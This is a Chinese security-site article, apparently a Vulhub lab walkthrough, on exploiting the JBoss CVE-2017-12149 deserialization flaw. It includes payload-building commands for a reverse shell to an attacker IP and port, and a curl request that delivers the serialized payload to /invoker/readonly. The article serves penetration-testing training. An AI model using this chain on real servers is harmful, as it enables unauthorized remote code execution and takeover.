freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Jboss远程代码执行(CVE-2017-12149 )
Koi 2023-11-24 09:30:09 148691

一、漏洞原理

该漏洞为 Java反序列化类型,位于 Jboss 的 HttpInvoker 组件中ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

CVE-2017-12149漏洞影响版本: 5.X 及 6.X

docker-compose.yml情况

version: '2'
services:
  jboss:
    image: vulhub/jboss:as-6.1.0
    ports:
      - "9990:9990"
      - "8080:8080"

二、实验过程

基于Vulhub平台

靶机Ubuntu搭建docker。IP地址为:192.168.200.47

攻击机Kali。IP地址为:192.168.200.14

启动环境环境,打开靶场网址:IP地址:8080

1700789175_655ffbb779090bcc26823.png!small?1700789176328

方法一:使用 jboss CVE-2017-12149工具

github搜索即可开源工具很多

1700789186_655ffbc26654a70fdebbe.png!small?1700789186966

root权限下,执行任意命令

1700789195_655ffbcb55c6d6df02d06.png!small?1700789195910

方法二:通过反弹sell获得root权限

1、下载漏洞利用的POC网址

https://github.com/joaomatosf/JavaDeserH2HC

2、编译并生成序列化数据,生成ReverseShellCommonsCollectionsHashMap.class文件(payload文件)

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

1700789205_655ffbd599de5d2feab59.png!small?1700789206882

3、序列化恶意数据至文件,生成ReverseShellCommonsCollectionsHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP地址:监听端口

1700789255_655ffc078c164a28b0a0c.png!small?1700789256361

4、开启监听8899端口

5、把ReverseShellCommonsCollectionsHashMap.ser发送到靶机

curl http://靶机IP地址:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

1700789280_655ffc20ad2db3ee84552.png!small?1700789281720

6、反弹结果

1700789291_655ffc2b72f9b8fc84a70.png!small?1700789292078

# 渗透测试 # 网络安全 # web安全 # 漏洞分析
本文为 Koi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
WEB安全系列
Koi LV.6
每个人都是都是独一无二的个体。
  • 41 文章数
  • 28 关注者
Noob 靶场完整解析
2024-03-23
Al-Web-1.0 靶机 渗透测试
2024-03-20
Vulhub 练习 DC-4靶机完整复现
2024-03-11
文章目录